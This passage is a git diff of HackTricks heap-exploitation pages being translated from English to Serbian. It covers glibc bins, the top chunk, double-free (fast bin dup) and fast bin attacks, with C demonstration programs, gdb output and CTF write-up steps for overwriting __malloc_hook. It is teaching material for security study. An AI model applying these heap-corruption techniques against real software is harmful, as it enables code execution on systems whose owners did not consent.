<= 45) ? 49 + (((unsigned long) (sz)) >> 6) :\ +((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\ +((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\ +((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\ +((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\ +126) // XXX It remains to be seen whether it is good to keep the widths of // XXX the buckets the same or whether it should be scaled by a factor // XXX of two as well. #define largebin_index_64(sz) \ - (((((unsigned long) (sz)) >> 6) <= 48) ? 48 + (((unsigned long) (sz)) >> 6) :\ - ((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\ - ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\ - ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\ - ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\ - 126) +(((((unsigned long) (sz)) >> 6) <= 48) ? 48 + (((unsigned long) (sz)) >> 6) :\ +((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\ +((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\ +((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\ +((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\ +126) #define largebin_index(sz) \ - (SIZE_SZ == 8 ? largebin_index_64 (sz) \ - : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz) \ - : largebin_index_32 (sz)) +(SIZE_SZ == 8 ? largebin_index_64 (sz) \ +: MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz) \ +: largebin_index_32 (sz)) ``` -
-Add a large chunk example - +Dodajte veliki primer ```c #include #include int main(void) { - char *chunks[2]; +char *chunks[2]; - chunks[0] = malloc(0x1500); - chunks[1] = malloc(0x1500); - free(chunks[0]); - chunks[0] = malloc(0x2000); +chunks[0] = malloc(0x1500); +chunks[1] = malloc(0x1500); +free(chunks[0]); +chunks[0] = malloc(0x2000); - return 0; +return 0; } ``` +2 velike alokacije se vrše, zatim se jedna oslobađa (stavljajući je u neusortiranu kantu) i vrši se veća alokacija (premještajući oslobođenu iz neusortirane kante u veliku kantu). -2 large allocations are performed, then on is freed (putting it in the unsorted bin) and a bigger allocation in made (moving the free one from the usorted bin ro the large bin). - -Compile it and debug it with a breakpoint in the `ret` opcode from `main` function. then with `gef` you can see that the tcache bin is full and one chunk is in the large bin: - +Kompajlirajte to i debagujte sa tačkom prekida u `ret` opkodu iz `main` funkcije. Tada sa `gef` možete videti da je tcache kanta puna i da je jedan deo u velikoj kanti: ```bash gef➤ heap bin ──────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────── @@ -520,117 +489,108 @@ Fastbins[idx=6, size=0x80] 0x00 [+] Found 0 chunks in 0 small non-empty bins. ──────────────────────────────────────────────────────────────────────── Large Bins for arena at 0xfffff7f90b00 ──────────────────────────────────────────────────────────────────────── [+] large_bins[100]: fw=0xaaaaaaac1290, bk=0xaaaaaaac1290 - → Chunk(addr=0xaaaaaaac12a0, size=0x1510, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) +→ Chunk(addr=0xaaaaaaac12a0, size=0x1510, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) [+] Found 1 chunks in 1 large non-empty bins. ``` -
-### Top Chunk - +### Gornji deo ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/malloc.c#L1711 /* - Top +Top - The top-most available chunk (i.e., the one bordering the end of - available memory) is treated specially. It is never included in - any bin, is used only if no other chunk is available, and is - released back to the system if it is very large (see - M_TRIM_THRESHOLD). Because top initially - points to its own bin with initial zero size, thus forcing - extension on the first malloc request, we avoid having any special - code in malloc to check whether it even exists yet. But we still - need to do so when getting memory from system, so we make - initial_top treat the bin as a legal but unusable chunk during the - interval between initialization and the first call to - sysmalloc. (This is somewhat delicate, since it relies on - the 2 preceding words to be zero during this interval as well.) - */ +The top-most available chunk (i.e., the one bordering the end of +available memory) is treated specially. It is never included in +any bin, is used only if no other chunk is available, and is +released back to the system if it is very large (see +M_TRIM_THRESHOLD). Because top initially +points to its own bin with initial zero size, thus forcing +extension on the first malloc request, we avoid having any special +code in malloc to check whether it even exists yet. But we still +need to do so when getting memory from system, so we make +initial_top treat the bin as a legal but unusable chunk during the +interval between initialization and the first call to +sysmalloc. (This is somewhat delicate, since it relies on +the 2 preceding words to be zero during this interval as well.) +*/ /* Conveniently, the unsorted bin can be used as dummy top on first call */ #define initial_top(M) (unsorted_chunks (M)) ``` +U suštini, ovo je deo koji sadrži sve trenutno dostupne heap-ove. Kada se izvrši malloc, ako ne postoji dostupna slobodna jedinica za korišćenje, ova gornja jedinica će smanjiti svoju veličinu kako bi dala neophodan prostor.\ +Pokazivač na Gornju Jedinicu se čuva u `malloc_state` strukturi. -Basically, this is a chunk containing all the currently available heap. When a malloc is performed, if there isn't any available free chunk to use, this top chunk will be reducing its size giving the necessary space.\ -The pointer to the Top Chunk is stored in the `malloc_state` struct. - -Moreover, at the beginning, it's possible to use the unsorted chunk as the top chunk. +Pored toga, na početku, moguće je koristiti nesortiranu jedinicu kao gornju jedinicu.
-Observe the Top Chunk example - +Posmatrajte primer Gornje Jedinice ```c #include #include int main(void) { - char *chunk; - chunk = malloc(24); - printf("Address of the chunk: %p\n", (void *)chunk); - gets(chunk); - return 0; +char *chunk; +chunk = malloc(24); +printf("Address of the chunk: %p\n", (void *)chunk); +gets(chunk); +return 0; } ``` - -After compiling and debugging it with a break point in the `ret` opcode of `main` I saw that the malloc returned the address `0xaaaaaaac12a0` and these are the chunks: - +Nakon kompajliranja i debagovanja sa tačkom prekida u `ret` opkodu `main`, video sam da je malloc vratio adresu `0xaaaaaaac12a0` i ovo su delovi: ```bash gef➤ heap chunks Chunk(addr=0xaaaaaaac1010, size=0x290, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) - [0x0000aaaaaaac1010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................] +[0x0000aaaaaaac1010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................] Chunk(addr=0xaaaaaaac12a0, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) - [0x0000aaaaaaac12a0 41 41 41 41 41 41 41 00 00 00 00 00 00 00 00 00 AAAAAAA.........] +[0x0000aaaaaaac12a0 41 41 41 41 41 41 41 00 00 00 00 00 00 00 00 00 AAAAAAA.........] Chunk(addr=0xaaaaaaac12c0, size=0x410, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) - [0x0000aaaaaaac12c0 41 64 64 72 65 73 73 20 6f 66 20 74 68 65 20 63 Address of the c] +[0x0000aaaaaaac12c0 41 64 64 72 65 73 73 20 6f 66 20 74 68 65 20 63 Address of the c] Chunk(addr=0xaaaaaaac16d0, size=0x410, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) - [0x0000aaaaaaac16d0 41 41 41 41 41 41 41 0a 00 00 00 00 00 00 00 00 AAAAAAA.........] +[0x0000aaaaaaac16d0 41 41 41 41 41 41 41 0a 00 00 00 00 00 00 00 00 AAAAAAA.........] Chunk(addr=0xaaaaaaac1ae0, size=0x20530, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ← top chunk ``` - -Where it can be seen that the top chunk is at address `0xaaaaaaac1ae0`. This is no surprise because the last allocated chunk was in `0xaaaaaaac12a0` with a size of `0x410` and `0xaaaaaaac12a0 + 0x410 = 0xaaaaaaac1ae0` .\ -It's also possible to see the length of the Top chunk on its chunk header: - +Gde se može videti da je gornji deo na adresi `0xaaaaaaac1ae0`. To nije iznenađenje jer je poslednji alocirani deo bio na `0xaaaaaaac12a0` sa veličinom `0x410` i `0xaaaaaaac12a0 + 0x410 = 0xaaaaaaac1ae0`.\ +Takođe je moguće videti dužinu gornjeg dela na njegovom zaglavlju dela: ```bash gef➤ x/8wx 0xaaaaaaac1ae0 - 16 0xaaaaaaac1ad0: 0x00000000 0x00000000 0x00020531 0x00000000 0xaaaaaaac1ae0: 0x00000000 0x00000000 0x00000000 0x00000000 ``` -
-### Last Remainder +### Poslednji Ostatak -When malloc is used and a chunk is divided (from the unsorted bin or from the top chunk for example), the chunk created from the rest of the divided chunk is called Last Remainder and it's pointer is stored in the `malloc_state` struct. +Kada se koristi malloc i deo se deli (na primer, iz nesortiranog bin-a ili iz gornjeg dela), deo koji se stvara od ostatka podeljenog dela se naziva Poslednji Ostatak i njegov pokazivač se čuva u `malloc_state` strukturi. -## Allocation Flow +## Tok Alokacije -Check out: +Pogledajte: {{#ref}} heap-memory-functions/malloc-and-sysmalloc.md {{#endref}} -## Free Flow +## Tok Oslobađanja -Check out: +Pogledajte: {{#ref}} heap-memory-functions/free.md {{#endref}} -## Heap Functions Security Checks +## Provere Bezbednosti Funkcija na Heap-u -Check the security checks performed by heavily used functions in heap in: +Proverite provere bezbednosti koje obavljaju često korišćene funkcije na heap-u u: {{#ref}} heap-memory-functions/heap-functions-security-checks.md {{#endref}} -## References +## Reference - [https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/](https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/) - [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/) diff --git a/src/binary-exploitation/libc-heap/double-free.md b/src/binary-exploitation/libc-heap/double-free.md index a30116d58..e0705f2bc 100644 --- a/src/binary-exploitation/libc-heap/double-free.md +++ b/src/binary-exploitation/libc-heap/double-free.md @@ -2,91 +2,89 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -If you free a block of memory more than once, it can mess up the allocator's data and open the door to attacks. Here's how it happens: when you free a block of memory, it goes back into a list of free chunks (e.g. the "fast bin"). If you free the same block twice in a row, the allocator detects this and throws an error. But if you **free another chunk in between, the double-free check is bypassed**, causing corruption. +Ako oslobodite blok memorije više od jednom, to može poremetiti podatke alokatora i otvoriti vrata napadima. Evo kako se to dešava: kada oslobodite blok memorije, on se vraća u listu slobodnih delova (npr. "brzi bin"). Ako oslobodite isti blok dva puta zaredom, alokator to detektuje i javlja grešku. Ali ako **oslobodite drugi deo između, provera duplog oslobađanja se zaobilazi**, što uzrokuje oštećenje. -Now, when you ask for new memory (using `malloc`), the allocator might give you a **block that's been freed twice**. This can lead to two different pointers pointing to the same memory location. If an attacker controls one of those pointers, they can change the contents of that memory, which can cause security issues or even allow them to execute code. - -Example: +Sada, kada zatražite novu memoriju (koristeći `malloc`), alokator vam može dati **blok koji je oslobođen dva puta**. To može dovesti do dva različita pokazivača koji upućuju na istu memorijsku lokaciju. Ako napadač kontroliše jedan od tih pokazivača, može promeniti sadržaj te memorije, što može izazvati sigurnosne probleme ili čak omogućiti izvršavanje koda. +Primer: ```c #include #include int main() { - // Allocate memory for three chunks - char *a = (char *)malloc(10); - char *b = (char *)malloc(10); - char *c = (char *)malloc(10); - char *d = (char *)malloc(10); - char *e = (char *)malloc(10); - char *f = (char *)malloc(10); - char *g = (char *)malloc(10); - char *h = (char *)malloc(10); - char *i = (char *)malloc(10); +// Allocate memory for three chunks +char *a = (char *)malloc(10); +char *b = (char *)malloc(10); +char *c = (char *)malloc(10); +char *d = (char *)malloc(10); +char *e = (char *)malloc(10); +char *f = (char *)malloc(10); +char *g = (char *)malloc(10); +char *h = (char *)malloc(10); +char *i = (char *)malloc(10); - // Print initial memory addresses - printf("Initial allocations:\n"); - printf("a: %p\n", (void *)a); - printf("b: %p\n", (void *)b); - printf("c: %p\n", (void *)c); - printf("d: %p\n", (void *)d); - printf("e: %p\n", (void *)e); - printf("f: %p\n", (void *)f); - printf("g: %p\n", (void *)g); - printf("h: %p\n", (void *)h); - printf("i: %p\n", (void *)i); +// Print initial memory addresses +printf("Initial allocations:\n"); +printf("a: %p\n", (void *)a); +printf("b: %p\n", (void *)b); +printf("c: %p\n", (void *)c); +printf("d: %p\n", (void *)d); +printf("e: %p\n", (void *)e); +printf("f: %p\n", (void *)f); +printf("g: %p\n", (void *)g); +printf("h: %p\n", (void *)h); +printf("i: %p\n", (void *)i); - // Fill tcache - free(a); - free(b); - free(c); - free(d); - free(e); - free(f); - free(g); +// Fill tcache +free(a); +free(b); +free(c); +free(d); +free(e); +free(f); +free(g); - // Introduce double-free vulnerability in fast bin - free(h); - free(i); - free(h); +// Introduce double-free vulnerability in fast bin +free(h); +free(i); +free(h); - // Reallocate memory and print the addresses - char *a1 = (char *)malloc(10); - char *b1 = (char *)malloc(10); - char *c1 = (char *)malloc(10); - char *d1 = (char *)malloc(10); - char *e1 = (char *)malloc(10); - char *f1 = (char *)malloc(10); - char *g1 = (char *)malloc(10); - char *h1 = (char *)malloc(10); - char *i1 = (char *)malloc(10); - char *i2 = (char *)malloc(10); +// Reallocate memory and print the addresses +char *a1 = (char *)malloc(10); +char *b1 = (char *)malloc(10); +char *c1 = (char *)malloc(10); +char *d1 = (char *)malloc(10); +char *e1 = (char *)malloc(10); +char *f1 = (char *)malloc(10); +char *g1 = (char *)malloc(10); +char *h1 = (char *)malloc(10); +char *i1 = (char *)malloc(10); +char *i2 = (char *)malloc(10); - // Print initial memory addresses - printf("After reallocations:\n"); - printf("a1: %p\n", (void *)a1); - printf("b1: %p\n", (void *)b1); - printf("c1: %p\n", (void *)c1); - printf("d1: %p\n", (void *)d1); - printf("e1: %p\n", (void *)e1); - printf("f1: %p\n", (void *)f1); - printf("g1: %p\n", (void *)g1); - printf("h1: %p\n", (void *)h1); - printf("i1: %p\n", (void *)i1); - printf("i2: %p\n", (void *)i2); +// Print initial memory addresses +printf("After reallocations:\n"); +printf("a1: %p\n", (void *)a1); +printf("b1: %p\n", (void *)b1); +printf("c1: %p\n", (void *)c1); +printf("d1: %p\n", (void *)d1); +printf("e1: %p\n", (void *)e1); +printf("f1: %p\n", (void *)f1); +printf("g1: %p\n", (void *)g1); +printf("h1: %p\n", (void *)h1); +printf("i1: %p\n", (void *)i1); +printf("i2: %p\n", (void *)i2); - return 0; +return 0; } ``` +U ovom primeru, nakon popunjavanja tcache-a sa nekoliko oslobođenih delova (7), kod **oslobađa deo `h`, zatim deo `i`, a zatim ponovo `h`, uzrokujući double free** (poznat i kao Fast Bin dup). Ovo otvara mogućnost dobijanja preklapajućih memorijskih adresa prilikom ponovnog alociranja, što znači da dva ili više pokazivača mogu ukazivati na istu memorijsku lokaciju. Manipulacija podacima kroz jedan pokazivač može zatim uticati na drugi, stvarajući kritičan bezbednosni rizik i potencijal za eksploataciju. -In this example, after filling the tcache with several freed chunks (7), the code **frees chunk `h`, then chunk `i`, and then `h` again, causing a double free** (also known as Fast Bin dup). This opens the possibility of receiving overlapping memory addresses when reallocating, meaning two or more pointers can point to the same memory location. Manipulating data through one pointer can then affect the other, creating a critical security risk and potential for exploitation. +Izvršavajući to, obratite pažnju na to kako **`i1` i `i2` imaju istu adresu**: -Executing it, note how **`i1` and `i2` got the same address**: - -
Initial allocations:
+
Početne alokacije:
 a: 0xaaab0f0c22a0
 b: 0xaaab0f0c22c0
 c: 0xaaab0f0c22e0
@@ -96,7 +94,7 @@ f: 0xaaab0f0c2340
 g: 0xaaab0f0c2360
 h: 0xaaab0f0c2380
 i: 0xaaab0f0c23a0
-After reallocations:
+Nakon ponovnih alokacija:
 a1: 0xaaab0f0c2360
 b1: 0xaaab0f0c2340
 c1: 0xaaab0f0c2320
@@ -109,23 +107,23 @@ h1: 0xaaab0f0c2380
 i2: 0xaaab0f0c23a0
 

 
-## Examples
+## Primeri
 
 - [**Dragon Army. Hack The Box**](https://7rocky.github.io/en/ctf/htb-challenges/pwn/dragon-army/)
-  - We can only allocate Fast-Bin-sized chunks except for size `0x70`, which prevents the usual `__malloc_hook` overwrite.
-  - Instead, we use PIE addresses that start with `0x56` as a target for Fast Bin dup (1/2 chance).
-  - One place where PIE addresses are stored is in `main_arena`, which is inside Glibc and near `__malloc_hook`
-  - We target a specific offset of `main_arena` to allocate a chunk there and continue allocating chunks until reaching `__malloc_hook` to get code execution.
+- Možemo alocirati samo Fast-Bin veličine delove osim za veličinu `0x70`, što sprečava uobičajeno prepisivanje `__malloc_hook`.
+- Umesto toga, koristimo PIE adrese koje počinju sa `0x56` kao cilj za Fast Bin dup (1/2 šansa).
+- Jedno mesto gde se čuvaju PIE adrese je u `main_arena`, koja se nalazi unutar Glibc i blizu `__malloc_hook`.
+- Ciljamo specifičan pomak `main_arena` da bismo alocirali deo tamo i nastavljamo sa alokacijom delova dok ne dođemo do `__malloc_hook` da bismo dobili izvršenje koda.
 - [**zero_to_hero. PicoCTF**](https://7rocky.github.io/en/ctf/picoctf/binary-exploitation/zero_to_hero/)
-  - Using Tcache bins and a null-byte overflow, we can achieve a double-free situation:
-    - We allocate three chunks of size `0x110` (`A`, `B`, `C`)
-    - We free `B`
-    - We free `A` and allocate again to use the null-byte overflow
-    - Now `B`'s size field is `0x100`, instead of `0x111`, so we can free it again
-    - We have one Tcache-bin of size `0x110` and one of size `0x100` that point to the same address. So we have a double free.
-  - We leverage the double free using [Tcache poisoning](tcache-bin-attack.md)
+- Koristeći Tcache binove i overflow sa null-bajtom, možemo postići situaciju double-free:
+- Alociramo tri dela veličine `0x110` (`A`, `B`, `C`)
+- Oslobađamo `B`
+- Oslobađamo `A` i ponovo alociramo da bismo iskoristili overflow sa null-bajtom
+- Sada je veličina `B`-ovog polja `0x100`, umesto `0x111`, tako da ga možemo ponovo osloboditi
+- Imamo jedan Tcache-bin veličine `0x110` i jedan veličine `0x100` koji ukazuju na istu adresu. Tako imamo double free.
+- Iskorišćavamo double free koristeći [Tcache poisoning](tcache-bin-attack.md)
 
-## References
+## Reference
 
 - [https://heap-exploitation.dhavalkapil.com/attacks/double_free](https://heap-exploitation.dhavalkapil.com/attacks/double_free)
 
diff --git a/src/binary-exploitation/libc-heap/fast-bin-attack.md b/src/binary-exploitation/libc-heap/fast-bin-attack.md
index c36c675de..c500203fa 100644
--- a/src/binary-exploitation/libc-heap/fast-bin-attack.md
+++ b/src/binary-exploitation/libc-heap/fast-bin-attack.md
@@ -2,18 +2,17 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-For more information about what is a fast bin check this page:
+Za više informacija o tome šta je fast bin, pogledajte ovu stranicu:
 
 {{#ref}}
 bins-and-memory-allocations.md
 {{#endref}}
 
-Because the fast bin is a singly linked list, there are much less protections than in other bins and just **modifying an address in a freed fast bin** chunk is enough to be able to **allocate later a chunk in any memory address**.
-
-As summary:
+Pošto je fast bin jednostruko povezani spisak, postoji mnogo manje zaštita nego u drugim binovima i samo **modifikacija adrese u oslobođenom fast bin** delu je dovoljna da se **kasnije alocira deo na bilo kojoj memorijskoj adresi**.
 
+Kao rezime:
 ```c
 ptr0 = malloc(0x20);
 ptr1 = malloc(0x20);
@@ -29,9 +28,7 @@ free(ptr1)
 ptr2 = malloc(0x20); // This will get ptr1
 ptr3 = malloc(0x20); // This will get a chunk in the 
 which could be abuse to overwrite arbitrary content inside of it
 ```
-
-You can find a full example in a very well explained code from [https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html](https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html):
-
+Možete pronaći potpuni primer u veoma dobro objašnjenom kodu sa [https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html](https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html):
 ```c
 #include 
 #include 
@@ -39,112 +36,111 @@ You can find a full example in a very well explained code from [https://guyinatu
 
 int main(void)
 {
-    puts("Today we will be discussing a fastbin attack.");
-    puts("There are 10 fastbins, which act as linked lists (they're separated by size).");
-    puts("When a chunk is freed within a certain size range, it is added to one of the fastbin linked lists.");
-    puts("Then when a chunk is allocated of a similar size, it grabs chunks from the corresponding fastbin (if there are chunks in it).");
-    puts("(think sizes 0x10-0x60 for fastbins, but that can change depending on some settings)");
-    puts("\nThis attack will essentially attack the fastbin by using a bug to edit the linked list to point to a fake chunk we want to allocate.");
-    puts("Pointers in this linked list are allocated when we allocate a chunk of the size that corresponds to the fastbin.");
-    puts("So we will just allocate chunks from the fastbin after we edit a pointer to point to our fake chunk, to get malloc to return a pointer to our fake chunk.\n");
-    puts("So the tl;dr objective of a fastbin attack is to allocate a chunk to a memory region of our choosing.\n");
+puts("Today we will be discussing a fastbin attack.");
+puts("There are 10 fastbins, which act as linked lists (they're separated by size).");
+puts("When a chunk is freed within a certain size range, it is added to one of the fastbin linked lists.");
+puts("Then when a chunk is allocated of a similar size, it grabs chunks from the corresponding fastbin (if there are chunks in it).");
+puts("(think sizes 0x10-0x60 for fastbins, but that can change depending on some settings)");
+puts("\nThis attack will essentially attack the fastbin by using a bug to edit the linked list to point to a fake chunk we want to allocate.");
+puts("Pointers in this linked list are allocated when we allocate a chunk of the size that corresponds to the fastbin.");
+puts("So we will just allocate chunks from the fastbin after we edit a pointer to point to our fake chunk, to get malloc to return a pointer to our fake chunk.\n");
+puts("So the tl;dr objective of a fastbin attack is to allocate a chunk to a memory region of our choosing.\n");
 
-    puts("Let's start, we will allocate three chunks of size 0x30\n");
-    unsigned long *ptr0, *ptr1, *ptr2;
+puts("Let's start, we will allocate three chunks of size 0x30\n");
+unsigned long *ptr0, *ptr1, *ptr2;
 
-    ptr0 = malloc(0x30);
-    ptr1 = malloc(0x30);
-    ptr2 = malloc(0x30);
+ptr0 = malloc(0x30);
+ptr1 = malloc(0x30);
+ptr2 = malloc(0x30);
 
-    printf("Chunk 0: %p\n", ptr0);
-    printf("Chunk 1: %p\n", ptr1);
-    printf("Chunk 2: %p\n\n", ptr2);
+printf("Chunk 0: %p\n", ptr0);
+printf("Chunk 1: %p\n", ptr1);
+printf("Chunk 2: %p\n\n", ptr2);
 
 
-    printf("Next we will make an integer variable on the stack. Our goal will be to allocate a chunk to this variable (because why not).\n");
+printf("Next we will make an integer variable on the stack. Our goal will be to allocate a chunk to this variable (because why not).\n");
 
-    int stackVar = 0x55;
+int stackVar = 0x55;
 
-    printf("Integer: %x\t @: %p\n\n", stackVar, &stackVar);
+printf("Integer: %x\t @: %p\n\n", stackVar, &stackVar);
 
-    printf("Proceeding that I'm going to write just some data to the three heap chunks\n");
+printf("Proceeding that I'm going to write just some data to the three heap chunks\n");
 
-    char *data0 = "00000000";
-    char *data1 = "11111111";
-    char *data2 = "22222222";
+char *data0 = "00000000";
+char *data1 = "11111111";
+char *data2 = "22222222";
 
-    memcpy(ptr0, data0, 0x8);
-    memcpy(ptr1, data1, 0x8);
-    memcpy(ptr2, data2, 0x8);
+memcpy(ptr0, data0, 0x8);
+memcpy(ptr1, data1, 0x8);
+memcpy(ptr2, data2, 0x8);
 
-    printf("We can see the data that is held in these chunks. This data will get overwritten when they get added to the fastbin.\n");
+printf("We can see the data that is held in these chunks. This data will get overwritten when they get added to the fastbin.\n");
 
-    printf("Chunk 0: %s\n", (char *)ptr0);
-    printf("Chunk 1: %s\n", (char *)ptr1);
-    printf("Chunk 2: %s\n\n", (char *)ptr2);
+printf("Chunk 0: %s\n", (char *)ptr0);
+printf("Chunk 1: %s\n", (char *)ptr1);
+printf("Chunk 2: %s\n\n", (char *)ptr2);
 
-    printf("Next we are going to free all three pointers. This will add all of them to the fastbin linked list. We can see that they hold pointers to chunks that will be allocated.\n");
+printf("Next we are going to free all three pointers. This will add all of them to the fastbin linked list. We can see that they hold pointers to chunks that will be allocated.\n");
 
-    free(ptr0);
-    free(ptr1);
-    free(ptr2);
+free(ptr0);
+free(ptr1);
+free(ptr2);
 
-    printf("Chunk0 @ 0x%p\t contains: %lx\n", ptr0, *ptr0);
-    printf("Chunk1 @ 0x%p\t contains: %lx\n", ptr1, *ptr1);
-    printf("Chunk2 @ 0x%p\t contains: %lx\n\n", ptr2, *ptr2);
+printf("Chunk0 @ 0x%p\t contains: %lx\n", ptr0, *ptr0);
+printf("Chunk1 @ 0x%p\t contains: %lx\n", ptr1, *ptr1);
+printf("Chunk2 @ 0x%p\t contains: %lx\n\n", ptr2, *ptr2);
 
-    printf("So we can see that the top two entries in the fastbin (the last two chunks we freed) contains pointers to the next chunk in the fastbin. The last chunk in there contains `0x0` as the next pointer to indicate the end of the linked list.\n\n");
+printf("So we can see that the top two entries in the fastbin (the last two chunks we freed) contains pointers to the next chunk in the fastbin. The last chunk in there contains `0x0` as the next pointer to indicate the end of the linked list.\n\n");
 
 
-    printf("Now we will edit a freed chunk (specifically the second chunk \"Chunk 1\"). We will be doing it with a use after free, since after we freed it we didn't get rid of the pointer.\n");
-    printf("We will edit it so the next pointer points to the address of the stack integer variable we talked about earlier. This way when we allocate this chunk, it will put our fake chunk (which points to the stack integer) on top of the free list.\n\n");
+printf("Now we will edit a freed chunk (specifically the second chunk \"Chunk 1\"). We will be doing it with a use after free, since after we freed it we didn't get rid of the pointer.\n");
+printf("We will edit it so the next pointer points to the address of the stack integer variable we talked about earlier. This way when we allocate this chunk, it will put our fake chunk (which points to the stack integer) on top of the free list.\n\n");
 
-    *ptr1 = (unsigned long)((char *)&stackVar);
+*ptr1 = (unsigned long)((char *)&stackVar);
 
-    printf("We can see it's new value of Chunk1 @ %p\t hold: 0x%lx\n\n", ptr1, *ptr1);
+printf("We can see it's new value of Chunk1 @ %p\t hold: 0x%lx\n\n", ptr1, *ptr1);
 
 
-    printf("Now we will allocate three new chunks. The first one will pretty much be a normal chunk. The second one is the chunk which the next pointer we overwrote with the pointer to the stack variable.\n");
-    printf("When we allocate that chunk, our fake chunk will be at the top of the fastbin. Then we can just allocate one more chunk from that fastbin to get malloc to return a pointer to the stack variable.\n\n");
+printf("Now we will allocate three new chunks. The first one will pretty much be a normal chunk. The second one is the chunk which the next pointer we overwrote with the pointer to the stack variable.\n");
+printf("When we allocate that chunk, our fake chunk will be at the top of the fastbin. Then we can just allocate one more chunk from that fastbin to get malloc to return a pointer to the stack variable.\n\n");
 
-    unsigned long *ptr3, *ptr4, *ptr5;
+unsigned long *ptr3, *ptr4, *ptr5;
 
-    ptr3 = malloc(0x30);
-    ptr4 = malloc(0x30);
-    ptr5 = malloc(0x30);
+ptr3 = malloc(0x30);
+ptr4 = malloc(0x30);
+ptr5 = malloc(0x30);
 
-    printf("Chunk 3: %p\n", ptr3);
-    printf("Chunk 4: %p\n", ptr4);
-    printf("Chunk 5: %p\t Contains: 0x%x\n", ptr5, (int)*ptr5);
+printf("Chunk 3: %p\n", ptr3);
+printf("Chunk 4: %p\n", ptr4);
+printf("Chunk 5: %p\t Contains: 0x%x\n", ptr5, (int)*ptr5);
 
-    printf("\n\nJust like that, we executed a fastbin attack to allocate an address to a stack variable using malloc!\n");
+printf("\n\nJust like that, we executed a fastbin attack to allocate an address to a stack variable using malloc!\n");
 }
 ```
-
 > [!CAUTION]
-> If it's possible to overwrite the value of the global variable **`global_max_fast`** with a big number, this allows to generate fast bin chunks of bigger sizes, potentially allowing to perform fast bin attacks in scenarios where it wasn't possible previously. This situation useful in the context of [large bin attack](large-bin-attack.md) and [unsorted bin attack](unsorted-bin-attack.md)
+> Ako je moguće prepisati vrednost globalne promenljive **`global_max_fast`** velikim brojem, to omogućava generisanje fast bin chunk-ova većih veličina, potencijalno omogućavajući izvođenje fast bin napada u scenarijima gde to prethodno nije bilo moguće. Ova situacija je korisna u kontekstu [large bin attack](large-bin-attack.md) i [unsorted bin attack](unsorted-bin-attack.md)
 
-## Examples
+## Primeri
 
 - **CTF** [**https://guyinatuxedo.github.io/28-fastbin_attack/0ctf_babyheap/index.html**](https://guyinatuxedo.github.io/28-fastbin_attack/0ctf_babyheap/index.html)**:**
-  - It's possible to allocate chunks, free them, read their contents and fill them (with an overflow vulnerability).
-    - **Consolidate chunk for infoleak**: The technique is basically to abuse the overflow to create a fake `prev_size` so one previous chunks is put inside a bigger one, so when allocating the bigger one containing another chunk, it's possible to print it's data an leak an address to libc (`main_arena+88`).
-    - **Overwrite malloc hook**: For this, and abusing the previous overlapping situation, it was possible to have 2 chunks that were pointing to the same memory. Therefore, freeing them both (freeing another chunk in between to avoid protections) it was possible to have the same chunk in the fast bin 2 times. Then, it was possible to allocate it again, overwrite the address to the next chunk to point a bit before `__malloc_hook` (so it points to an integer that malloc thinks is a free size - another bypass), allocate it again and then allocate another chunk that will receive an address to malloc hooks.\
-      Finally a **one gadget** was written in there.
+- Moguće je alocirati chunk-ove, osloboditi ih, pročitati njihov sadržaj i popuniti ih (sa ranjivošću prelivanja).
+- **Konsolidacija chunk-a za infoleak**: Tehnika se u suštini sastoji u zloupotrebi prelivanja kako bi se kreirao lažni `prev_size`, tako da jedan prethodni chunk bude smešten unutar većeg, tako da kada se alocira veći koji sadrži drugi chunk, moguće je odštampati njegove podatke i procuriti adresu do libc (`main_arena+88`).
